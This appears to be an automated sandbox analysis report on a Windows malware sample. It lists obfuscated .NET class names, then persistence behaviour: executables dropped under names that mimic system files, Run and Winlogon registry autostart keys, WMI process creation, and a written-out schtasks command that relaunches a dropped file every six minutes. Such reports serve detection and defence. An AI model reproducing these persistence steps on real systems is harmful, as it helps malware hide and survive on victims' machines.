Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, UcGflgBDT3lsQIJRV0o.cs	High entropy of concatenated method names: 'nsHB2JaU3D', 'B97BZSsdd1', 'LnkGGPFyWajv91KqHjhW', 'GRvdjrFyRBX9oiVYtcub', 'db71vvFyme8GQQbJBXhT', 'jsskJAFyfrpXQf1wjpGO', 'weKBH1LHME', 'lGVBn9aKfs', 'oOHB7HEkJe', 'k9JBsUyOpd'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, RKIDm31jt3nbX5Wu9NT.cs	High entropy of concatenated method names: 'sQ5U52FLbp01haYDFrcS', 'IAI25PFLVpj1KOrqdgka', 'CJr0vRFLN2hSPQDRTiqa', 'o5L0wyVt0e', 'tAJ0GeFLSysc3DB2JQWv', 'I7ZWbRFLyGE0a0PjEqLm', 'QQvxviFL34fVmHbnBn9Z', 'MDXvb6FLaPwKnkuONyaw', 'QihUFE6Niw', 'JCojaRFLc8LyKwgq4pM4'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, fX8eQwiGCO6SdHJqcBH.cs	High entropy of concatenated method names: 'OKMFtvnjs5T', 'LZGiAI7IKZ', 'QmUFtQ3vdQ5', 'T7UaVPFDvMHhOrIgdJEU', 'tTsyYvFDQYnhZFlVCdKH', 'NFi66WFDUQDlAwCy8biO', 'DJQqVdFDhDBHjPfZp21a', 'byGUyIFDpCIpJmIwhYVO', 'xQXyU8FD5I1CqRlQYLAU', 'erqZaWFDiLnTbgvuxxVr'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, FrEqMemkBngvOql2XZc.cs	High entropy of concatenated method names: 'fiTmOoDbMD', 'je2mHdF193', 'q5tmnJwMkt', 'rSAP8nFVT3FbMIUqJme0', 'mdxZOtFVcNV4q4MKGvjY', 'S73i1gFVLuUs2cCAEtdj', 'aZgpRHFVdRZG2nwPRj1N', 'BhRmrJZfSK', 'yZKmVusUgO', 'zTSmNYhlnd'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, n51JElzTmUmkggO9LA.cs	High entropy of concatenated method names: 'tw0FFXXuJ2', 'bnsFmS0TNr', 'ahSFWWZ3xM', 'GENFfDLhAx', 'PMOFqgE6Jp', 'k27FBigkJa', 'tyPF1TwqKq', 'CuduQmFgmokVcBJrYxDX', 'woYjhYFgWlA7B0cXF4C9', 'VMdfjQFgfsvRHFMcNrZo'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, YXAOeSKjqyIxbBq3IcE.cs	High entropy of concatenated method names: 'eHtKK5JaCB', 'DupKkx2FOb', 'IfLKgQCaSn', 'JhCKr724v0', 'e1EKVwflY7', 'ti4aQCFnLKMmK2KSh2vi', 'WPVnVwFn3jLZaMCnHwgB', 'XbfRMnFnaONBXIV4AFXS', 'nRqJp6FndSunhXyQ5uQr', 'qHs4xYFnTML2uAPOWFWM'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, D2p9XAqyRSObWLQZe0B.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'gknFtlu7GB3', 'tppFWFnnMPA', 'dMvdhJFeaYvZ7YHeTOqi', 'OgP91TFeLF5NL3vJI3XA', 'U9rUxtFedqpxvf0m2k4X'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, no4PKlrwIkMZVpKKVjy.cs	High entropy of concatenated method names: 'qYAVCCEO2n', 'i3gVFHY6HS', 'etKVRPliSX', 'je4VmwOOs6', 'KDiVWxudIt', 'Y7SVffXN7F', 'Si1cHVFscn1c3i9ahUMr', 'c80cFuFsd1gAMkZa4w06', 'pQ5AoJFsTFZTfJ1cvDyJ', 'O1NgL8FsDOpUsrboaaDc'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, EBqZ44fAx1Cx4xcMqDt.cs	High entropy of concatenated method names: 'u2pfMMSIHr', 'qHXfJD5Z3P', 'SZLfwMrUtT', 'H9afzXTWPa', 'NIVqCwbAMq', 'MRrqF3H6fe', 'tToqRJO17P', 'WhifryFelTlyi5apqveC', 'qLqZqBFet6ABNSh4jjJj', 'ALOMoZFe1FqCy4pgaETt'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, LqXXCXbtkhyL3k8Wu7s.cs	High entropy of concatenated method names: 'ASPblfPqml', 'olTbxDT1dY', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'Ud8b4kjWvU', 'method_2', 'uc7'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, ELfSQutga90qN9hiPTZ.cs	High entropy of concatenated method names: 'MMrtVmh4qw', 'IGBtNc3J07', 'bSmtbygvhw', 'dvJteQSfCV', 'Uf0tSfst4p', 'asvtyyOQqp', 'CbBxZZFyuyP8g6U1ohAR', 'pVUPeqFyIkJLfpFokAHD', 'j3yC97Fy9GwJIhsFYTS6', 'eYclNeFy2eJYfGo4oetw'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, d276UegDlySAk6ipgAK.cs	High entropy of concatenated method names: 'VqfgJ2gI0K', 'MmrgzgvRnx', 'Jo8gHAVTpC', 'NX5gnRFHWr', 'IGeg73xr61', 'GmkgsOXh2d', 'wtwg8Akgok', 'akBgGlq7W3', 'g3kgPkmNYA', 'yAigA01y1G'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, HFpfHkVcEPMgdY0KgJk.cs	High entropy of concatenated method names: 'CfFVORQb2C', 'moUVHEcPSj', 'MYlVn1jSNW', 'YpDV77QJnq', 'D4SVsZUSkf', 'q7oV8ZIrBJ', 'E2JVGDsinG', 'J9OVPWSUTC', 'xFdVAFarsR', 'zeZVux7Jt0'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, eCc9safhO5jkv3cSGMm.cs	High entropy of concatenated method names: 'OgbfgafHZu', 'KhOfrCiC3J', 'nWwfVWcGtU', 'RdSpBZFb300tAWl6VVBM', 'xhO1HCFbaD5hxaVF70Dl', 'd8PbogFbS06F4wQbVjNb', 'A6wMkEFbyLq9AKrWLlql', 'M1nfjGHuvC', 'aiWfEoIjpg', 'EisVanFbblWFXBgWaVti'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, SFJ0Yp6hbywbZLCPU1g.cs	High entropy of concatenated method names: 'WlMpu4FOlkEAIsLIDHeU', 'g6b8cTFOxtWYDTQ0hxAh', 'feacnaFOtfk25udhUHiA', 'DY6WLFFO102y2JvVAs0B', 'method_0', 'method_1', 'q3s6QvcnKO', 'Cu56pf1sIr', 'jqY65tZ0bf', 'TxL6igftkC'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, sOQSJw1RbCONc9XBNnw.cs	High entropy of concatenated method names: 'Hn81WYab80', 'vZm1ftL3g7', 'w9T1qlbGRB', 'MRi1BH926E', 'qo41tUXMLC', 'NLE113e0sK', 'ekV1lM2Ck2', 'WY41xnMJN7', 'Owe14Dicsc', 'FN71Y85aWk'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, bBXk7o2bxZxi5i8NE3U.cs	High entropy of concatenated method names: 'ffi2SIsTAF', 'xbC2ytDU0v', 'QX123Jk4qj', 'u832a8bFIF', 'Dispose', 'Bdj1sPFM0xPqnP9giqwe', 'X9RthoFMUgyJslaiWaid', 'GBKO0lFMhffE40QpxpAb', 'NIUUEkFMvt2xY1Q5x34l', 'cbBHVrFMQQlWUKIeMkCr'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, UtHdrj2YosutCLKVjcS.cs	High entropy of concatenated method names: 'oNn2h0mtXJ', 's9C25IqHIl', 'SJZ2XXGRTE', 'OfT2ooww6m', 'O7n2j6Vq5W', 'xEQ2Ex0Oad', 'dB92K03sLH', 'Sic2k5L0If', 'Dispose', 'jEgNo3FMBsk81fRVog8N'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, nW5ZnUTZwIJ6JZfHIcM.cs	High entropy of concatenated method names: 'UaJTJThv7i', 'm68TwOSTB6', 'hRuTz1umBY', 'E4EcCyTJ41', 'Na3cFcFDUN', 'L1ycRSNOGI', 'wACcmslEhy', 'veCcWYrmPI', 'yi5cfsQLqA', 'WZicqRBejW'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	High entropy of concatenated method names: 'odwpDQFJmn9yZUtdDcnR', 'GQYFXFFJWYGZFErHRoij', 'sjfMIFtEuU', 'cCanUsFJtRm9gvDbUwbs', 'QttDgyFJ1Qiy0WMqEStN', 'RYaBqFFJl4cM5C6Pixau', 'XQIHvhFJxhLDvmHxhpee', 'owIdeCFJ482ZHcK7OC0T', 's1w0fxFJYku8eKtjt932', 'eQM7e5FJ0ehQ4Zjc9mj4'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, g3VvtZgmURJWyMLWjAV.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'SJwgfaEjZU', 'Write', 'qEngqFHjOJ', 'y1mgB34elA', 'Flush', 'vl7'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, RnCU5MFpcDgWsccjmZv.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'yDIFBzX6etv', 'tppFWFnnMPA', 'n82YKKFgprXX8WI3mAiW', 'c29cqFFg589U3E4tEsE3'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, DMFUBvJprpZ6MX95NQt.cs	High entropy of concatenated method names: 'Cu2JV2f5bA', 'LqOJNVUSJ7', 'V0eJbWuH5m', 'kbxJe0IASH', 'yxvJSCiNRk', 'HPZJySlHWX', 'ENTJ3b0G4P', 'MJBJaPcUPc', 'vRLJLvSJMQ', 'ngrJdy2w0C'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, XsNwZojAVEhLp21jheL.cs	High entropy of concatenated method names: 'HmCjI18pHY', 'fKfj9pqCd8', 'zSBj2ALEic', 'B79jZBkKe8', 'UvDjMnr3ua', 'PIgSe2FHDg2lfrIxihG7', 'sLDvvDFHT6FIi80ehxeF', 'WI1qCBFHcvPMxHCTvXjl', 'PJBMZZFHOxrigkjIP7UH', 'VZ0jlXFHHHbi7J5vEkk8'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, scC9m8kb2G5L9TRMhiU.cs	High entropy of concatenated method names: 'method_0', 'Q5LkS2gIBe', 'LWfky6gr0j', 'oNPk3ic7YH', 'GOZkaFojqc', 'ocrkLaETD3', 'Bg2kdO8aQc', 'ko1F7LF7q4uU2ICIx5RI', 'X8jkh5F7BtAlibv66G0c', 'gMEWVjF7tHT97L44JsUA'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, D1iQNZ6xCqtDlO26Eue.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'JroFtX3jgfF', 'prCFtogCS3O', 'wBQkm1FDHG88TM0llMCQ', 'IEuv6SFDnIGLxtfKMbaR', 'H1w6cOFD7MV9oqZnYdYY', 'e7OZGQFDsewxWWkuVMkN', 'eHbIfgFD8tAKKkXhSujf', 'eU8s2TFDG1hJwY65jM3I'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, bkahGwRPJAf3nl0OqmU.cs	High entropy of concatenated method names: 'HAYmBGFMYH', 'XO5N5DFr2Fqt4s0r0ycv', 'Ol6lvsFrZG1sZiG014QH', 'FIgZSoFrMioK1grwhG4n', 'aI3NK0FrJnLnpZRrLgfN', 'G1nUnmFrIKZ1D0lExB6p', 'r3oVtrFr9ambCeqH2A5e', 'BOPCTbFrwPIjq0qgX7ux', 'wOsmC209Tv', 'KBpmRBsoBU'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, IoVxrLKIFt7fXiO2BQQ.cs	High entropy of concatenated method names: 'pmrK2il4gs', 'gSdKZSDsFF', 'QCKKMqYve5', 'luNFpGFnuVtV3fMpxIwH', 'i8U2UgFnP3Ue9Zwgj2EN', 'otUKkNFnAvIMyrKiTy8u', 'IqYbOPFnIiV1nHGZtuIE', 'EXQ1aVFn906W0jndHo3g', 'jLhL0uFn2wcB02PiE8hN'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, FspQ6oESkE0N7J4rQfO.cs	High entropy of concatenated method names: 'fLyE3KjXoR', 'xJ2qfdFHzVBO3jWYApYU', 'pDYm0dFnCo6kBTtdSk58', 'i262DsFnFnrY46GSe6i7', 'vIWghQFnRgkcDbMQ86Ni'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, bk5JwiIkDZSiBcrm3L1.cs	High entropy of concatenated method names: 'TCJFtKDL6TX', 'whcFq6ugZ2a', 'yQ8', 'K9m', 'GpJCvaF2VZ7hYOsm3c3F', 'R5IpdCF2gd1kf7gkCo1Q', 'k92AaiF2rP5PihDBDRxt', 'r8VX40F2NWMFrJvAnEkt'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, f4FS5rfyCG0BE2ExRgC.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cmJFWxfZlfA', 'l29favHWCB', 'imethod_0', 'LyvNDcFbd1sWI3BZr3S7', 'PLTjCOFbTCxaDN2wayGf', 'v2DWR1FbcEmN68S7rkSd', 'P91k7gFbDgnEjwbFuvZY'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, IaFqGvr7qoMTj0vWCqI.cs	High entropy of concatenated method names: 'WEqr81yMT2', 'MberGBn6FH', 'EBhrP5wk1s', 'Wb9TnuFs6RSRD0gmCNQs', 'ogb7X9FsXdiRreInpLBb', 'ML6jjqFsobJo2f4AbAYV', 'bf1xd7FsjMMRvHFKuxcZ', 'yUO1gcFsEIc2F7yFZS4e', 'PyIi9bFsKcWYv1nI1GO1', 'glmJ33Fsk0sIH8tDWghC'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, f4FUZyVtnmNWPJZGv5K.cs	High entropy of concatenated method names: 'UcXVly93bv', 'H9lVxYGhTh', 'sY6V4LBiCD', 'SenugbFsGbC9KyyeaouX', 'YCJJVIFsPnsF0jOHMq9P', 'GxOZRsFsAr2dLk2YsHRP', 'EmqKrAFsu4mRgaIpNtA5', 'nmIq0lFsIAWK39FscZti', 'jFNs1dFs9D4okfqOAevN'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, oWMIeSVbARowYyO8CCL.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, nimHOhqDR0XehhUMn1D.cs	High entropy of concatenated method names: 'boMq2PFf1o', 'seaqZ90N2d', 'uL2qMecyHO', 'lJgIjuFewM9QScMDVjcM', 'vL9tX6FezCKspq19XrX5', 'OOHi4rFeMqpxMT6iyupS', 'yursa8FeJU5QxyrJSe3N', 'SYVqHfxkbm', 'wSsqnq2Os5', 'IgRq7b7OWI'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, d4DDcFB1YaeS5ymMq2O.cs	High entropy of concatenated method names: 'ni7BxbmRSE', 'FFmB45wUFG', 'J3m6roFSYPLTdis0kOaM', 'EBBv1vFSxfTFMsDElaIf', 'R1dY4ZFS4DrWxUQ38v7a', 's7MPgCFS01jYQMaaAlAe', 'pMQsGOFSUDBibYsZrEWj', 'HL5J86FShawcDXC0uCMh', 'eZNMCXFSvYXF5e6yItGV', 'dWCE7CFSQluYbZ0rSt1r'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, B7swkY5d24qgw4JNMTX.cs	High entropy of concatenated method names: 'iQd57yhWUd', 'PiW5sMLOcS', 'NZy584U091', 'X4auF2FctCnlo7GQwIT9', 'sCq3UMFc1AWEPgvuKqH7', 'c0up9uFcqjm5SMNYMK3H', 'ojNgaJFcBfnU0tvZdsRt', 'OGG5copb4i', 'Yju5DJgMC4', 'RfY5Oyq7sU'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, qsb7IV6F2wSBjePpK4D.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'gD1Ft5oX5Jg', 'MmxFtic2k7s', 'qwDP7SFDVE78WIihpT4v', 'N46MTHFDNtLnpIFmSUXs', 'tjfpIMFDbRfGw9ivExQA', 'J4kruxFDeX63OHadpheu', 'xIm8LXFDSJt86TayxHfM', 'bReQaLFDyGev0q6i6qOC'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, FBDnIjkxxqDhtGVx6Kr.cs	High entropy of concatenated method names: 'nLNkYVBg1T', 'JuJk0AaSsV', 'rMlkUvxIhZ', 'eVskh86UI4', 'hEBkvkyEEo', 'O5QWyWFnw6BZIHYR1HAr', 'DEyfcuFnMaKrV4plHFGc', 'kq6xYBFnJM23ETZs5sje', 'EFJ3E8Fnz8igK6aHnWQW', 'X4263QF7COBi7Zlq8R2a'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, EdHrs5Riu05jhthKn9l.cs	High entropy of concatenated method names: 'tHkRXqKx3Z', 'gXyRoq6276', 'yNTJJVFrX7fRvnnl88ru', 'V9AI9yFrivlevqDg23pP', 'PAskerFr6dJw3iKElp5I', 'U8xKS3FrobHkrwwfg7iF', 'R3fVEdFrjlUNHFtxiUsI', 'zqn3BsFrEQ1ovdiGNKCI', 'iOO8TxFrKhvbiqWswitP', 'VeUwH0FrkdnM3Z29N9vA'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, h0h4vuruufbah7wPSfo.cs	High entropy of concatenated method names: 'K0Hr9Sk9AD', 'q3rr2abS8J', 'wJGrZ3GVkQ', 'prDrM3r0nb', 'wdvrJDVBiC', 'KFuts5FsVBiSk3QU7r2L', 'F5mAYAFsNJB3PahIeOHf', 'pJv2cIFsbN1MPwkbdlxh', 'blH2U7FseQVNMRErdy59', 'yfdKaoFsST8jq2J8s868'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, oQXbyMf1LcX9TnWRQFc.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'aTiFtfNqhuQ', 'tppFWFnnMPA', 'udv1OPFbUxWpPT9p81nI', 'OLduAyFbhkt949WfEMwt', 'PD0gdGFbvmj3HwfQVDE8', 'iOvSaWFbQO62XpLDWCol'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, hJrPErXYRO7mn0ciTTb.cs	High entropy of concatenated method names: 'q5OjFL0h3k', 'FGZD2YFHh9a4WaDTOjNs', 'Q929sFFH0uEYQYdM8hCr', 'YEQs6jFHUeauAusAP7IN', 'yow53ZFHv90aqs9WigdM', 'wVoXU5XNl1', 'VXGXhFvij6', 'L2YXvJT7d2', 'PbKXQwNcbS', 'VNMXpQVnXI'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, JvN7QYQTR4ll9U8FD3.cs	High entropy of concatenated method names: 'MFfyxWVf5', 'oyyljwFkVg6DhPIw7fpj', 'fwC10vFkNRRJt2dKPUtT', 'INnm5YFkbPsaOla3rHXu', 'Eoh5E4F4i', 'poFiHqPmo', 'JUm6CYrrc', 'iDRXS1p1P', 'k3doM7ZY0', 'XA0jEvTmW'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executable to a common third party application directory

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

File written: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe

Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\fontrefcrt\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yX8787W7de.exe	File created: C:\fontrefcrt\MsintoRefcommonsvc.exe	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	File created: C:\Users\user\Desktop\wNZUMzpS.log	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Recovery\SystemSettings.exe	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Users\user\Desktop\iJCvyQAH.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File created: C:\Users\user\Desktop\iJCvyQAH.log			Jump to dropped file
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	File created: C:\Users\user\Desktop\wNZUMzpS.log			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"			Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"			Jump to behavior

Creates multiple autostart registry keys

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SystemSettings.exe'" /f

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc	Jump to behavior
